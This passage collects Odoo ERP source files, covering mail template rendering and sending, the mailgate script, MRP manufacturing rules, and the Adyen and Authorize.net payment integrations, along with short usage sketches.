with the result of evaluating these expressions with an evaluation
context containing:
- ``user``: Model of the current user
- ``object``: record of the document record this mail is related to
- ``context``: the context passed to the mail composition wizard
:param str template_txt: the template text to render
:param str model: model name of the document record this mail is related to.
        :param res_ids: id, or list of ids, of the document records these mails are related to.
"""
multi_mode = True
if isinstance(res_ids, pycompat.integer_types):
multi_mode = False
res_ids = [res_ids]
results = dict.fromkeys(res_ids, u"")
# try to load the template
try:
mako_env = mako_safe_template_env if self.env.context.get('safe') else mako_template_env
template = mako_env.from_string(tools.ustr(template_txt))
except Exception:
_logger.info("Failed to load template %r", template_txt, exc_info=True)
return multi_mode and results or results[res_ids[0]]
# prepare template variables
records = self.env[model].browse(it for it in res_ids if it) # filter to avoid browsing [None]
res_to_rec = dict.fromkeys(res_ids, None)
for record in records:
res_to_rec[record.id] = record
variables = {
'format_date': lambda date, format=False, context=self._context: format_date(self.env, date, format),
'format_tz': lambda dt, tz=False, format=False, context=self._context: format_tz(self.env, dt, tz, format),
'format_amount': lambda amount, currency, context=self._context: format_amount(self.env, amount, currency),
'user': self.env.user,
'ctx': self._context, # context kw would clash with mako internals
}
for res_id, record in res_to_rec.items():
variables['object'] = record
try:
render_result = template.render(variables)
except Exception:
_logger.info("Failed to render template %r using values %r" % (template, variables), exc_info=True)
raise UserError(_("Failed to render template %r using values %r")% (template, variables))
if render_result == u"False":
render_result = u""
results[res_id] = render_result
if post_process:
for res_id, result in results.items():
results[res_id] = self.render_post_process(result)
return multi_mode and results or results[res_ids[0]]
@api.multi
def get_email_template(self, res_ids):
multi_mode = True
if isinstance(res_ids, pycompat.integer_types):
res_ids = [res_ids]
multi_mode = False
if res_ids is None:
res_ids = [None]
results = dict.fromkeys(res_ids, False)
if not self.ids:
return results
self.ensure_one()
langs = self._render_template(self.lang, self.model, res_ids)
for res_id, lang in langs.items():
if lang:
template = self.with_context(lang=lang)
else:
template = self
results[res_id] = template
return multi_mode and results or results[res_ids[0]]
@api.multi
def generate_recipients(self, results, res_ids):
"""Generates the recipients of the template. Default values can ben generated
instead of the template values if requested by template or context.
Emails (email_to, email_cc) can be transformed into partners if requested
in the context. """
self.ensure_one()
if self.use_default_to or self._context.get('tpl_force_default_to'):
default_recipients = self.env['mail.thread'].message_get_default_recipients(res_model=self.model, res_ids=res_ids)
for res_id, recipients in default_recipients.items():
results[res_id].pop('partner_to', None)
results[res_id].update(recipients)
records_company = None
if self._context.get('tpl_partners_only') and self.model and results and 'company_id' in self.env[self.model]._fields:
records = self.env[self.model].browse(results.keys()).read(['company_id'])
records_company = {rec['id']: (rec['company_id'][0] if rec['company_id'] else None) for rec in records}
for res_id, values in results.items():
partner_ids = values.get('partner_ids', list())
if self._context.get('tpl_partners_only'):
mails = tools.email_split(values.pop('email_to', '')) + tools.email_split(values.pop('email_cc', ''))
Partner = self.env['res.partner']
if records_company:
Partner = Partner.with_context(default_company_id=records_company[res_id])
for mail in mails:
partner_id = Partner.find_or_create(mail)
partner_ids.append(partner_id)
partner_to = values.pop('partner_to', '')
if partner_to:
# placeholders could generate '', 3, 2 due to some empty field values
tpl_partner_ids = [int(pid) for pid in partner_to.split(',') if pid]
partner_ids += self.env['res.partner'].sudo().browse(tpl_partner_ids).exists().ids
results[res_id]['partner_ids'] = partner_ids
return results
@api.multi
def generate_email(self, res_ids, fields=None):
"""Generates an email from the template for given the given model based on
records given by res_ids.
        :param res_ids: id, or list of ids, of the record(s) to use for rendering the template
            (the model is taken from the template definition)
:returns: a dict containing all relevant fields for creating a new
mail.mail entry, with one extra key ``attachments``, in the
format [(report_name, data)] where data is base64 encoded.
"""
self.ensure_one()
multi_mode = True
if isinstance(res_ids, pycompat.integer_types):
res_ids = [res_ids]
multi_mode = False
if fields is None:
fields = ['subject', 'body_html', 'email_from', 'email_to', 'partner_to', 'email_cc', 'reply_to', 'scheduled_date']
res_ids_to_templates = self.get_email_template(res_ids)
# templates: res_id -> template; template -> res_ids
templates_to_res_ids = {}
for res_id, template in res_ids_to_templates.items():
templates_to_res_ids.setdefault(template, []).append(res_id)
results = dict()
for template, template_res_ids in templates_to_res_ids.items():
Template = self.env['mail.template']
# generate fields value for all res_ids linked to the current template
if template.lang:
Template = Template.with_context(lang=template._context.get('lang'))
for field in fields:
Template = Template.with_context(safe=field in {'subject'})
generated_field_values = Template._render_template(
getattr(template, field), template.model, template_res_ids,
post_process=(field == 'body_html'))
for res_id, field_value in generated_field_values.items():
results.setdefault(res_id, dict())[field] = field_value
# compute recipients
if any(field in fields for field in ['email_to', 'partner_to', 'email_cc']):
results = template.generate_recipients(results, template_res_ids)
# update values for all res_ids
for res_id in template_res_ids:
values = results[res_id]
# body: add user signature, sanitize
if 'body_html' in fields and template.user_signature:
signature = self.env.user.signature
if signature:
values['body_html'] = tools.append_content_to_html(values['body_html'], signature, plaintext=False)
if values.get('body_html'):
values['body'] = tools.html_sanitize(values['body_html'])
# technical settings
values.update(
mail_server_id=template.mail_server_id.id or False,
auto_delete=template.auto_delete,
model=template.model,
res_id=res_id or False,
attachment_ids=[attach.id for attach in template.attachment_ids],
)
# Add report in attachments: generate once for all template_res_ids
if template.report_template:
for res_id in template_res_ids:
attachments = []
report_name = self._render_template(template.report_name, template.model, res_id)
report = template.report_template
report_service = report.report_name
if report.report_type in ['qweb-html', 'qweb-pdf']:
result, format = report.render_qweb_pdf([res_id])
else:
res = report.render([res_id])
if not res:
raise UserError(_('Unsupported report type %s found.') % report.report_type)
result, format = res
# TODO in trunk, change return format to binary to match message_post expected format
result = base64.b64encode(result)
if not report_name:
report_name = 'report.' + report_service
ext = "." + format
if not report_name.endswith(ext):
report_name += ext
attachments.append((report_name, result))
results[res_id]['attachments'] = attachments
return multi_mode and results or results[res_ids[0]]
@api.multi
def send_mail(self, res_id, force_send=False, raise_exception=False, email_values=None, notif_layout=False):
""" Generates a new mail.mail. Template is rendered on record given by
res_id and model coming from template.
:param int res_id: id of the record to render the template
:param bool force_send: send email immediately; otherwise use the mail
queue (recommended);
:param dict email_values: update generated mail with those values to further
customize the mail;
:param str notif_layout: optional notification layout to encapsulate the
generated email;
:returns: id of the mail.mail that was created """
self.ensure_one()
Mail = self.env['mail.mail']
        Attachment = self.env['ir.attachment'] # TDE FIXME: should remove default_type from context
# create a mail_mail based on values, without attachments
values = self.generate_email(res_id)
values['recipient_ids'] = [(4, pid) for pid in values.get('partner_ids', list())]
values.update(email_values or {})
attachment_ids = values.pop('attachment_ids', [])
attachments = values.pop('attachments', [])
# add a protection against void email_from
if 'email_from' in values and not values.get('email_from'):
values.pop('email_from')
# encapsulate body
if notif_layout and values['body_html']:
try:
template = self.env.ref(notif_layout, raise_if_not_found=True)
except ValueError:
                _logger.warning('QWeb template %s not found when sending template %s. Sending without layout.' % (notif_layout, self.name))
else:
record = self.env[self.model].browse(res_id)
template_ctx = {
'message': self.env['mail.message'].sudo().new(dict(body=values['body_html'], record_name=record.display_name)),
'model_description': self.env['ir.model']._get(record._name).display_name,
'company': 'company_id' in record and record['company_id'] or self.env.user.company_id,
'record': record,
}
body = template.render(template_ctx, engine='ir.qweb', minimal_qcontext=True)
values['body_html'] = self.env['mail.thread']._replace_local_links(body)
mail = Mail.create(values)
# manage attachments
for attachment in attachments:
attachment_data = {
'name': attachment[0],
'datas_fname': attachment[0],
'datas': attachment[1],
'type': 'binary',
'res_model': 'mail.message',
'res_id': mail.mail_message_id.id,
}
attachment_ids.append(Attachment.create(attachment_data).id)
if attachment_ids:
values['attachment_ids'] = [(6, 0, attachment_ids)]
mail.write({'attachment_ids': [(6, 0, attachment_ids)]})
if force_send:
mail.send(raise_exception=raise_exception)
return mail.id # TDE CLEANME: return mail + api.returns ?
```
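
For orientation, here is a minimal usage sketch of the rendering entry points defined above. It assumes an Odoo shell with `env` in scope and a `mail.template` whose model is `res.partner`; `template_id` and `partner_id` are placeholders, not values coming from the module.

```python
# Hypothetical usage sketch (Odoo shell): render and send a mail.template for one record.
template = env['mail.template'].browse(template_id)   # template_id: placeholder id
partner = env['res.partner'].browse(partner_id)       # partner_id: placeholder id

# generate_email() renders subject, body, recipients and attachments for the record
values = template.generate_email(partner.id)
print(values['subject'], values.get('email_to'))

# send_mail() creates the mail.mail record; force_send pushes it out immediately
mail_id = template.send_mail(partner.id, force_send=True)
```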
#### File: static/scripts/odoo-mailgate.py
```python
import optparse
import sys
import traceback
import xmlrpclib
def main():
op = optparse.OptionParser(usage='usage: %prog [options]', version='%prog v1.2')
op.add_option("-d", "--database", dest="database", help="Odoo database name (default: %default)", default='odoo')
op.add_option("-u", "--userid", dest="userid", help="Odoo user id to connect with (default: %default)", default=1, type=int)
op.add_option("-p", "--password", dest="password", help="Odoo user password (default: %default)", default='admin')
op.add_option("--host", dest="host", help="Odoo host (default: %default)", default='localhost')
op.add_option("--port", dest="port", help="Odoo port (default: %default)", default=8069, type=int)
(o, args) = op.parse_args()
try:
msg = sys.stdin.read()
models = xmlrpclib.ServerProxy('http://%s:%s/xmlrpc/2/object' % (o.host, o.port), allow_none=True)
models.execute_kw(o.database, o.userid, o.password, 'mail.thread', 'message_process', [False, xmlrpclib.Binary(msg)], {})
except xmlrpclib.Fault as e:
# reformat xmlrpc faults to print a readable traceback
err = "xmlrpclib.Fault: %s\n%s" % (e.faultCode, e.faultString)
sys.exit(err)
except Exception as e:
traceback.print_exc(None, sys.stderr)
sys.exit(2)
if __name__ == '__main__':
main()
```
#### File: addons/mail/validation.py
```python
import logging
import os
from lxml import etree
from odoo.loglevels import ustr
from odoo.tools import misc, view_validation
_logger = logging.getLogger(__name__)
_activity_validator = None
@view_validation.validate('activity')
def schema_activity(arch):
""" Check the activity view against its schema
:type arch: etree._Element
"""
global _activity_validator
if _activity_validator is None:
with misc.file_open(os.path.join('mail', 'views', 'activity.rng')) as f:
_activity_validator = etree.RelaxNG(etree.parse(f))
if _activity_validator.validate(arch):
return True
for error in _activity_validator.error_log:
_logger.error(ustr(error))
return False
```
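
The schema check above boils down to a standard lxml RelaxNG validation. The following standalone sketch reproduces the pattern with a tiny inline schema instead of `mail/views/activity.rng`; the schema and the arch are made up for illustration only.

```python
# Minimal RelaxNG validation sketch mirroring schema_activity() above.
from io import BytesIO
from lxml import etree

rng = b"""<element name="activity" xmlns="http://relaxng.org/ns/structure/1.0">
    <attribute name="string"/>
</element>"""
validator = etree.RelaxNG(etree.parse(BytesIO(rng)))

arch = etree.fromstring('<activity string="My Activities"/>')
print(validator.validate(arch))        # True: the arch matches the schema
for error in validator.error_log:      # empty on success, logged by the addon otherwise
    print(error)
```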
#### File: mail/wizard/base_partner_merge.py
```python
from odoo import api, models, _
class MergePartnerAutomatic(models.TransientModel):
_inherit = 'base.partner.merge.automatic.wizard'
@api.multi
def _log_merge_operation(self, src_partners, dst_partner):
super(MergePartnerAutomatic, self)._log_merge_operation(src_partners, dst_partner)
dst_partner.message_post(body='%s %s' % (_("Merged with the following partners:"), ", ".join('%s <%s> (ID %s)' % (p.name, p.email or 'n/a', p.id) for p in src_partners)))
```
#### File: mrp/models/product.py
```python
from datetime import timedelta
from odoo import api, fields, models
from odoo.tools.float_utils import float_round
class ProductTemplate(models.Model):
_inherit = "product.template"
bom_line_ids = fields.One2many('mrp.bom.line', 'product_tmpl_id', 'BoM Components')
bom_ids = fields.One2many('mrp.bom', 'product_tmpl_id', 'Bill of Materials')
bom_count = fields.Integer('# Bill of Material', compute='_compute_bom_count')
used_in_bom_count = fields.Integer('# of BoM Where is Used', compute='_compute_used_in_bom_count')
mrp_product_qty = fields.Float('Manufactured', compute='_compute_mrp_product_qty')
produce_delay = fields.Float(
'Manufacturing Lead Time', default=0.0,
help="Average lead time in days to manufacture this product. In the case of multi-level BOM, the manufacturing lead times of the components will be added.")
def _compute_bom_count(self):
for product in self:
product.bom_count = self.env['mrp.bom'].search_count([('product_tmpl_id', '=', product.id)])
@api.multi
def _compute_used_in_bom_count(self):
for template in self:
template.used_in_bom_count = self.env['mrp.bom'].search_count(
[('bom_line_ids.product_id', 'in', template.product_variant_ids.ids)])
@api.multi
def action_used_in_bom(self):
self.ensure_one()
action = self.env.ref('mrp.mrp_bom_form_action').read()[0]
action['domain'] = [('bom_line_ids.product_id', 'in', self.product_variant_ids.ids)]
return action
@api.one
def _compute_mrp_product_qty(self):
self.mrp_product_qty = float_round(sum(self.mapped('product_variant_ids').mapped('mrp_product_qty')), precision_rounding=self.uom_id.rounding)
@api.multi
def action_view_mos(self):
action = self.env.ref('mrp.mrp_production_report').read()[0]
action['domain'] = [('state', '=', 'done'), ('product_tmpl_id', 'in', self.ids)]
action['context'] = {
'search_default_last_year_mo_order': 1,
'search_default_status': 1, 'search_default_scheduled_month': 1,
'graph_measure': 'product_uom_qty',
}
return action
class ProductProduct(models.Model):
_inherit = "product.product"
variant_bom_ids = fields.One2many('mrp.bom', 'product_id', 'BOM Product Variants')
bom_line_ids = fields.One2many('mrp.bom.line', 'product_id', 'BoM Components')
bom_count = fields.Integer('# Bill of Material', compute='_compute_bom_count')
used_in_bom_count = fields.Integer('# BoM Where Used', compute='_compute_used_in_bom_count')
mrp_product_qty = fields.Float('Manufactured', compute='_compute_mrp_product_qty')
def _compute_bom_count(self):
for product in self:
product.bom_count = self.env['mrp.bom'].search_count(['|', ('product_id', '=', product.id), '&', ('product_id', '=', False), ('product_tmpl_id', '=', product.product_tmpl_id.id)])
@api.multi
def _compute_used_in_bom_count(self):
for product in self:
product.used_in_bom_count = self.env['mrp.bom'].search_count([('bom_line_ids.product_id', '=', product.id)])
@api.multi
def action_used_in_bom(self):
self.ensure_one()
action = self.env.ref('mrp.mrp_bom_form_action').read()[0]
action['domain'] = [('bom_line_ids.product_id', '=', self.id)]
return action
def _compute_mrp_product_qty(self):
date_from = fields.Datetime.to_string(fields.datetime.now() - timedelta(days=365))
#TODO: state = done?
domain = [('state', '=', 'done'), ('product_id', 'in', self.ids), ('date_planned_start', '>', date_from)]
read_group_res = self.env['mrp.production'].read_group(domain, ['product_id', 'product_uom_qty'], ['product_id'])
mapped_data = dict([(data['product_id'][0], data['product_uom_qty']) for data in read_group_res])
for product in self:
product.mrp_product_qty = float_round(mapped_data.get(product.id, 0), precision_rounding=product.uom_id.rounding)
@api.multi
def action_view_bom(self):
action = self.env.ref('mrp.product_open_bom').read()[0]
template_ids = self.mapped('product_tmpl_id').ids
# bom specific to this variant or global to template
action['context'] = {
'default_product_tmpl_id': template_ids[0],
'default_product_id': self.ids[0],
}
action['domain'] = ['|', ('product_id', 'in', self.ids), '&', ('product_id', '=', False), ('product_tmpl_id', 'in', template_ids)]
return action
@api.multi
def action_view_mos(self):
action = self.env.ref('mrp.mrp_production_report').read()[0]
action['domain'] = [('state', '=', 'done'), ('product_id', 'in', self.ids)]
action['context'] = {
'search_default_last_year_mo_order': 1,
'search_default_status': 1, 'search_default_scheduled_month': 1,
'graph_measure': 'product_uom_qty',
}
return action
```
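
As a side note, the `read_group` folding in `_compute_mrp_product_qty` above is just a dictionary lookup with a default. A hand-worked, pure-Python sketch with invented rows:

```python
# Illustrative read_group rows: product_id comes back as an (id, display_name) pair.
read_group_res = [
    {'product_id': (7, 'Table'), 'product_uom_qty': 12.0},
    {'product_id': (9, 'Chair'), 'product_uom_qty': 3.5},
]
mapped_data = dict([(row['product_id'][0], row['product_uom_qty']) for row in read_group_res])

for product_id in (7, 9, 11):              # 11 had no finished manufacturing order in the period
    qty = mapped_data.get(product_id, 0)   # float_round(..., precision_rounding=...) is then applied per product
    print(product_id, qty)
```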
#### File: mrp/models/stock_rule.py
```python
from dateutil.relativedelta import relativedelta
from odoo import api, fields, models, _
from odoo.exceptions import UserError
from odoo.osv import expression
class StockRule(models.Model):
_inherit = 'stock.rule'
action = fields.Selection(selection_add=[('manufacture', 'Manufacture')])
def _get_message_dict(self):
message_dict = super(StockRule, self)._get_message_dict()
source, destination, operation = self._get_message_values()
manufacture_message = _('When products are needed in <b>%s</b>, <br/> a manufacturing order is created to fulfill the need.') % (destination)
if self.location_src_id:
manufacture_message += _(' <br/><br/> The components will be taken from <b>%s</b>.') % (source)
message_dict.update({
'manufacture': manufacture_message
})
return message_dict
@api.onchange('action')
def _onchange_action_operation(self):
domain = {'picking_type_id': []}
if self.action == 'manufacture':
domain = {'picking_type_id': [('code', '=', 'mrp_operation')]}
return {'domain': domain}
@api.multi
def _run_manufacture(self, product_id, product_qty, product_uom, location_id, name, origin, values):
Production = self.env['mrp.production']
ProductionSudo = Production.sudo().with_context(force_company=values['company_id'].id)
bom = self._get_matching_bom(product_id, values)
if not bom:
msg = _('There is no Bill of Material found for the product %s. Please define a Bill of Material for this product.') % (product_id.display_name,)
raise UserError(msg)
# create the MO as SUPERUSER because the current user may not have the rights to do it (mto product launched by a sale for example)
production = ProductionSudo.create(self._prepare_mo_vals(product_id, product_qty, product_uom, location_id, name, origin, values, bom))
origin_production = values.get('move_dest_ids') and values['move_dest_ids'][0].raw_material_production_id or False
orderpoint = values.get('orderpoint_id')
if orderpoint:
production.message_post_with_view('mail.message_origin_link',
values={'self': production, 'origin': orderpoint},
subtype_id=self.env.ref('mail.mt_note').id)
if origin_production:
production.message_post_with_view('mail.message_origin_link',
values={'self': production, 'origin': origin_production},
subtype_id=self.env.ref('mail.mt_note').id)
return True
@api.multi
def _get_matching_bom(self, product_id, values):
if values.get('bom_id', False):
return values['bom_id']
return self.env['mrp.bom'].with_context(
company_id=values['company_id'].id, force_company=values['company_id'].id
)._bom_find(product=product_id, picking_type=self.picking_type_id) # TDE FIXME: context bullshit
def _prepare_mo_vals(self, product_id, product_qty, product_uom, location_id, name, origin, values, bom):
return {
'origin': origin,
'product_id': product_id.id,
'product_qty': product_qty,
'product_uom_id': product_uom.id,
'location_src_id': self.location_src_id.id or self.picking_type_id.default_location_src_id.id or location_id.id,
'location_dest_id': location_id.id,
'bom_id': bom.id,
'date_planned_start': fields.Datetime.to_string(self._get_date_planned(product_id, values)),
'date_planned_finished': values['date_planned'],
'procurement_group_id': False,
'propagate': self.propagate,
'picking_type_id': self.picking_type_id.id or values['warehouse_id'].manu_type_id.id,
'company_id': values['company_id'].id,
'move_dest_ids': values.get('move_dest_ids') and [(4, x.id) for x in values['move_dest_ids']] or False,
}
def _get_date_planned(self, product_id, values):
format_date_planned = fields.Datetime.from_string(values['date_planned'])
date_planned = format_date_planned - relativedelta(days=product_id.produce_delay or 0.0)
date_planned = date_planned - relativedelta(days=values['company_id'].manufacturing_lead)
return date_planned
def _push_prepare_move_copy_values(self, move_to_copy, new_date):
new_move_vals = super(StockRule, self)._push_prepare_move_copy_values(move_to_copy, new_date)
new_move_vals['production_id'] = False
return new_move_vals
class ProcurementGroup(models.Model):
_inherit = 'procurement.group'
@api.model
def _get_moves_to_assign_domain(self):
domain = super(ProcurementGroup, self)._get_moves_to_assign_domain()
domain = expression.AND([domain, [('production_id', '=', False)]])
return domain
```
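
The date arithmetic in `_get_date_planned` simply walks the planned date back by the product and company lead times. A self-contained sketch with invented values:

```python
# Hypothetical numbers: a MO planned to finish on June 20th, with 3 days of
# manufacturing lead time on the product and 1 day of company-wide lead time.
from datetime import datetime
from dateutil.relativedelta import relativedelta

date_planned = datetime(2019, 6, 20, 12, 0)
produce_delay = 3.0        # product_id.produce_delay (days)
manufacturing_lead = 1.0   # company_id.manufacturing_lead (days)

start = date_planned - relativedelta(days=produce_delay) - relativedelta(days=manufacturing_lead)
print(start)   # 2019-06-16 12:00:00 -> used as date_planned_start on the manufacturing order
```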
#### File: payment_adyen/controllers/main.py
```python
import json
import logging
import pprint
import werkzeug
from odoo import http
from odoo.http import request
_logger = logging.getLogger(__name__)
class AdyenController(http.Controller):
_return_url = '/payment/adyen/return/'
@http.route([
'/payment/adyen/return',
], type='http', auth='none', csrf=False)
def adyen_return(self, **post):
_logger.info('Beginning Adyen form_feedback with post data %s', pprint.pformat(post)) # debug
if post.get('authResult') not in ['CANCELLED']:
request.env['payment.transaction'].sudo().form_feedback(post, 'adyen')
return werkzeug.utils.redirect('/payment/process')
@http.route([
'/payment/adyen/notification',
], type='http', auth='none', methods=['POST'], csrf=False)
def adyen_notification(self, **post):
tx = post.get('merchantReference') and request.env['payment.transaction'].sudo().search([('reference', 'in', [post.get('merchantReference')])], limit=1)
if post.get('eventCode') in ['AUTHORISATION'] and tx:
states = (post.get('merchantReference'), post.get('success'), tx.state)
if (post.get('success') == 'true' and tx.state == 'done') or (post.get('success') == 'false' and tx.state in ['cancel', 'error']):
                _logger.info('Notification from Adyen for the reference %s: received %s, state is %s', *states)
            else:
                _logger.warning('Notification from Adyen for the reference %s: received %s but state is %s', *states)
return '[accepted]'
```
#### File: payment_authorize/models/authorize_request.py
```python
import io
import requests
from lxml import etree, objectify
from xml.etree import ElementTree as ET
from uuid import uuid4
import pprint
import logging
from odoo.addons.payment.models.payment_acquirer import _partner_split_name
from odoo.exceptions import ValidationError, UserError
from odoo import _
_logger = logging.getLogger(__name__)
XMLNS = 'AnetApi/xml/v1/schema/AnetApiSchema.xsd'
def strip_ns(xml, ns):
"""Strip the provided name from tag names.
:param str xml: xml document
:param str ns: namespace to strip
:rtype: etree._Element
:return: the parsed xml string with the namespace prefix removed
"""
it = ET.iterparse(io.BytesIO(xml))
ns_prefix = '{%s}' % XMLNS
for _, el in it:
if el.tag.startswith(ns_prefix):
el.tag = el.tag[len(ns_prefix):] # strip all Auth.net namespaces
return it.root
def error_check(elem):
"""Check if the response sent by Authorize.net contains an error.
    Errors can be a failure to try the transaction (in that case, the transactionResponse
is empty, and the meaningful error message will be in message/code) or a failure to process
the transaction (in that case, the message/code content will be generic and the actual error
message is in transactionResponse/errors/error/errorText).
:param etree._Element elem: the root element of the response that will be parsed
:rtype: tuple (bool, str)
    :return: tuple containing a boolean indicating if the response should be considered
as an error and the most meaningful error message found in it.
"""
result_code = elem.find('messages/resultCode')
msg = 'No meaningful error message found, please check logs or the Authorize.net backend'
has_error = result_code is not None and result_code.text == 'Error'
if has_error:
        # accumulate the most meaningful error
error = elem.find('transactionResponse/errors/error')
error = error if error is not None else elem.find('messages/message')
if error is not None:
code = error[0].text
text = error[1].text
msg = '%s: %s' % (code, text)
return (has_error, msg)
class AuthorizeAPI():
"""Authorize.net Gateway API integration.
This class allows contacting the Authorize.net API with simple operation
requests. It implements a *very limited* subset of the complete API
(http://developer.authorize.net/api/reference); namely:
- Customer Profile/Payment Profile creation
- Transaction authorization/capture/voiding
"""
AUTH_ERROR_STATUS = 3
def __init__(self, acquirer):
"""Initiate the environment with the acquirer data.
:param record acquirer: payment.acquirer account that will be contacted
"""
if acquirer.environment == 'test':
self.url = 'https://apitest.authorize.net/xml/v1/request.api'
else:
self.url = 'https://api.authorize.net/xml/v1/request.api'
self.name = acquirer.authorize_login
self.transaction_key = acquirer.authorize_transaction_key
def _authorize_request(self, data):
"""Encode, send and process the request to the Authorize.net API.
Encodes the xml data and process the response. Note that only a basic
processing is done at this level (namespace cleanup, basic error management).
:param etree._Element data: etree data to process
"""
logged_data = data
data = etree.tostring(data, encoding='utf-8')
for node_to_remove in ['//merchantAuthentication', '//creditCard']:
for node in logged_data.xpath(node_to_remove):
node.getparent().remove(node)
logged_data = str(etree.tostring(logged_data, encoding='utf-8', pretty_print=True)).replace(r'\n', '\n')
_logger.info('_authorize_request: Sending values to URL %s, values:\n%s', self.url, logged_data)
r = requests.post(self.url, data=data, headers={'Content-Type': 'text/xml'})
r.raise_for_status()
response = strip_ns(r.content, XMLNS)
logged_data = etree.XML(r.content)
logged_data = str(etree.tostring(logged_data, encoding='utf-8', pretty_print=True)).replace(r'\n', '\n')
_logger.info('_authorize_request: Values received\n%s', logged_data)
return response
def _base_tree(self, requestType):
"""Create a basic tree containing authentication information.
Create a etree Element of type requestType and appends the Authorize.net
credentials (they are always required).
:param str requestType: the type of request to send to Authorize.net
See http://developer.authorize.net/api/reference
for available types.
:return: basic etree Element of the requested type
containing credentials information
:rtype: etree._Element
"""
root = etree.Element(requestType, xmlns=XMLNS)
auth = etree.SubElement(root, "merchantAuthentication")
etree.SubElement(auth, "name").text = self.name
etree.SubElement(auth, "transactionKey").text = self.transaction_key
return root
# Customer profiles
def create_customer_profile(self, partner, cardnumber, expiration_date, card_code):
"""Create a payment and customer profile in the Authorize.net backend.
Creates a customer profile for the partner/credit card combination and links
a corresponding payment profile to it. Note that a single partner in the Odoo
database can have multiple customer profiles in Authorize.net (i.e. a customer
profile is created for every res.partner/payment.token couple).
:param record partner: the res.partner record of the customer
:param str cardnumber: cardnumber in string format (numbers only, no separator)
:param str expiration_date: expiration date in 'YYYY-MM' string format
:param str card_code: three- or four-digit verification number
:return: a dict containing the profile_id and payment_profile_id of the
newly created customer profile and payment profile
:rtype: dict
"""
root = self._base_tree('createCustomerProfileRequest')
profile = etree.SubElement(root, "profile")
# merchantCustomerId is ODOO-{partner.id}-{random hex string} truncated to maximum 20 characters
etree.SubElement(profile, "merchantCustomerId").text = ('ODOO-%s-%s' % (partner.id, uuid4().hex[:8]))[:20]
etree.SubElement(profile, "email").text = partner.email or ''
payment_profile = etree.SubElement(profile, "paymentProfiles")
etree.SubElement(payment_profile, "customerType").text = 'business' if partner.is_company else 'individual'
billTo = etree.SubElement(payment_profile, "billTo")
if partner.is_company:
etree.SubElement(billTo, "firstName").text = ' '
etree.SubElement(billTo, "lastName").text = partner.name
else:
etree.SubElement(billTo, "firstName").text = _partner_split_name(partner.name)[0]
etree.SubElement(billTo, "lastName").text = _partner_split_name(partner.name)[1]
etree.SubElement(billTo, "address").text = (partner.street or '' + (partner.street2 if partner.street2 else '')) or None
missing_fields = [partner._fields[field].string for field in ['city', 'country_id'] if not partner[field]]
if missing_fields:
raise ValidationError({'missing_fields': missing_fields})
etree.SubElement(billTo, "city").text = partner.city
etree.SubElement(billTo, "state").text = partner.state_id.name or None
etree.SubElement(billTo, "zip").text = partner.zip or ''
etree.SubElement(billTo, "country").text = partner.country_id.name or None
payment = etree.SubElement(payment_profile, "payment")
creditCard = etree.SubElement(payment, "creditCard")
etree.SubElement(creditCard, "cardNumber").text = cardnumber
etree.SubElement(creditCard, "expirationDate").text = expiration_date
etree.SubElement(creditCard, "cardCode").text = card_code
etree.SubElement(root, "validationMode").text = 'liveMode'
response = self._authorize_request(root)
# If the user didn't set up authorize.net properly then the response
# won't contain stuff like customerProfileId and accessing text
# will raise a NoneType has no text attribute
msg = response.find('messages')
if msg is not None:
rc = msg.find('resultCode')
if rc is not None and rc.text == 'Error':
err = msg.find('message')
err_code = err.find('code').text
err_msg = err.find('text').text
raise UserError(
"Authorize.net Error:\nCode: %s\nMessage: %s"
% (err_code, err_msg)
)
res = dict()
res['profile_id'] = response.find('customerProfileId').text
res['payment_profile_id'] = response.find('customerPaymentProfileIdList/numericString').text
return res
def create_customer_profile_from_tx(self, partner, transaction_id):
"""Create an Auth.net payment/customer profile from an existing transaction.
Creates a customer profile for the partner/credit card combination and links
a corresponding payment profile to it. Note that a single partner in the Odoo
database can have multiple customer profiles in Authorize.net (i.e. a customer
profile is created for every res.partner/payment.token couple).
Note that this function makes 2 calls to the authorize api, since we need to
obtain a partial cardnumber to generate a meaningful payment.token name.
:param record partner: the res.partner record of the customer
:param str transaction_id: id of the authorized transaction in the
Authorize.net backend
:return: a dict containing the profile_id and payment_profile_id of the
newly created customer profile and payment profile as well as the
last digits of the card number
:rtype: dict
"""
root = self._base_tree('createCustomerProfileFromTransactionRequest')
etree.SubElement(root, "transId").text = transaction_id
customer = etree.SubElement(root, "customer")
# merchantCustomerId is ODOO-{partner.id}-{random hex string} truncated to maximum 20 characters
etree.SubElement(customer, "merchantCustomerId").text = ('ODOO-%s-%s' % (partner.id, uuid4().hex[:8]))[:20]
etree.SubElement(customer, "email").text = partner.email or ''
response = self._authorize_request(root)
res = dict()
if response.find('customerProfileId') is None: # Warning: do not use bool(etree) as the semantics is very misleading
_logger.warning(
'Unable to create customer payment profile, data missing from transaction. Transaction_id: %s - Partner_id: %s'
% (transaction_id, partner)
)
return res
res['profile_id'] = response.find('customerProfileId').text
res['payment_profile_id'] = response.find('customerPaymentProfileIdList/numericString').text
root_profile = self._base_tree('getCustomerPaymentProfileRequest')
etree.SubElement(root_profile, "customerProfileId").text = res['profile_id']
etree.SubElement(root_profile, "customerPaymentProfileId").text = res['payment_profile_id']
response_profile = self._authorize_request(root_profile)
res['name'] = response_profile.find('paymentProfile/payment/creditCard/cardNumber').text
return res
def credit(self, token, amount, transaction_id):
""" Refund a payment for the given amount.
:param record token: the payment.token record that must be refunded.
:param str amount: transaction amount
:param str transaction_id: the reference of the transacation that is going to be refunded.
:return: a dict containing the response code, transaction id and transaction type
:rtype: dict
"""
root = self._base_tree('createTransactionRequest')
tx = etree.SubElement(root, "transactionRequest")
etree.SubElement(tx, "transactionType").text = "refundTransaction"
etree.SubElement(tx, "amount").text = str(amount)
payment = etree.SubElement(tx, "payment")
credit_card = etree.SubElement(payment, "creditCard")
idx = token.name.find(' - ')
etree.SubElement(credit_card, "cardNumber").text = token.name[idx-4:idx] # shitty hack, but that's the only way to get the 4 last digits
etree.SubElement(credit_card, "expirationDate").text = "XXXX"
etree.SubElement(tx, "refTransId").text = transaction_id
response = self._authorize_request(root)
res = dict()
res['x_response_code'] = response.find('transactionResponse/responseCode').text
res['x_trans_id'] = transaction_id
res['x_type'] = 'refund'
return res
# Transaction management
def auth_and_capture(self, token, amount, reference):
"""Authorize and capture a payment for the given amount.
Authorize and immediately capture a payment for the given payment.token
record for the specified amount with reference as communication.
:param record token: the payment.token record that must be charged
:param str amount: transaction amount (up to 15 digits with decimal point)
:param str reference: used as "invoiceNumber" in the Authorize.net backend
:return: a dict containing the response code, transaction id and transaction type
:rtype: dict
"""
root = self._base_tree('createTransactionRequest')
tx = etree.SubElement(root, "transactionRequest")
